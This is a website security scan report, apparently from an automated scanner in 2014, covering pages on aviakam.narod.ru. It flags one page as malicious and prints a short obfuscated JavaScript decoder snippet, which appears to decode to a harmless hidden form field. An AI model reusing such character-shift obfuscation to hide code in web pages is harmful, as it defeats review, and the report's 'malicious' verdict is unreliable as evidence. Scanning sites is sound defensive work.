Scanned pages/files
Request | Server response | Status |
http://aviakam.narod.ru/ | 200 OK Content-Length: 15613 Content-Type: text/html | clean |
http://aviakam.narod.ru/abnl/?adsdata=JMsqBrLO9BP3EDvBN8Dx9wNWeYFD!lpIFIR1DMOlauy3zJuKLgycscdOh4;7uEC;gOi^0Pzj90Ha91SV5!J6LDfkY;fy3S;c3UfRuUJ;04hZOuYVc1GT;JPRe0xE73g9KUCmzCJ9xBOXhzPWCm^FRURn9Rth1OYkTaDc;rJvSskwrD1l8tmtVe0bq8!dO7KmbZkcXI132PD04J;vDpWd3yNC;NlNMVNXspUVPG6HJMhiFbyDVuRJYwBVNyI0vmavr8PD^e7uLeDf2e7kQBBWfJBSQVUdN8T;4DuLrX40YulX9X6ZRTL;qWxUwrgLRIAAb4fm2gKq2b9LTtidRWiNlsbTaDmq8Nz!IvhdbUfPLcLrpf801dDK08Tnyg;VsvaTVb;KhjC7Rps^szhLg7Bwl7co | 200 OK Content-Length: 3321 Content-Type: application/javascript | clean |
http://s202.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s202.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s202.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://aviakam.narod.ru/register | 200 OK Content-Length: 23356 Content-Type: text/html | clean |
http://aviakam.narod.ru/abnl/?adsdata=6DGR5CXD2f;yuCIQYtZMeJeg5tFZAJZdRC6BYbyzPTpJIizE1ffAD2bCQVPxyOWf938AS29y9C8yXYr2Y8zJ5YVvhIblm15QDsTa8tKVOFz0qdOI!yipWK^z0U1qz8AnPcm79j6pik1emeh^ | 200 OK Content-Length: 2725 Content-Type: application/javascript | clean |
http://aviakam.narod.ru/gb | 200 OK Content-Length: 31218 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var _y8M='';
function _dS(s){
  var i;
  var r="";
  var l=s.length-1;
  var k=s.substr(l,1);
  for (i=0;i<l;i++){
    c=s.charCodeAt(i)-k;
    if(c<32){ c=127-(32-c);}
    r+=String.fromCharCode(c);
  }
  return r;
}
_y8M=_dS('Cpuw|{\'{!wlD)opkklu)\'uhtlD)zvz)\'}hs|lD):877<<@:99)\'6E7');
Antivirus reports:
http://aviakam.narod.ru/abnl/?adsdata=Xg0lGMhqnDjJz4r682nV!OlR5iKJnNI1tkqzO3RreQSwm2454TjemlQIv6SbWyYSyhMYz3xzT14IMHHnSHIN!GjINDp^Le7kXmryM0vbIaSAR0JUZIGlJsxPqDcbmAGfkt!j9mYsQQqzr;oo | 200 OK Content-Length: 2721 Content-Type: application/javascript | clean |
http://aviakam.narod.ru/test404page.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://aviakam.narod.ru/news/rss/ | 200 OK Content-Length: 354 Content-Type: text/xml | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aviakam.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 09 Dec 2014 09:37:21 GMT
Server: uServ/3.2.2
Content-Length: 15613
Content-Type: text/html; charset=UTF-8
...15613 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: aviakam.narod.ru
Referer: http://www.google.com/search?q=aviakam.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aviakam.narod.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://aviakam.narod.ru/
Result: aviakam.narod.ru is not infected or malware details are not published yet.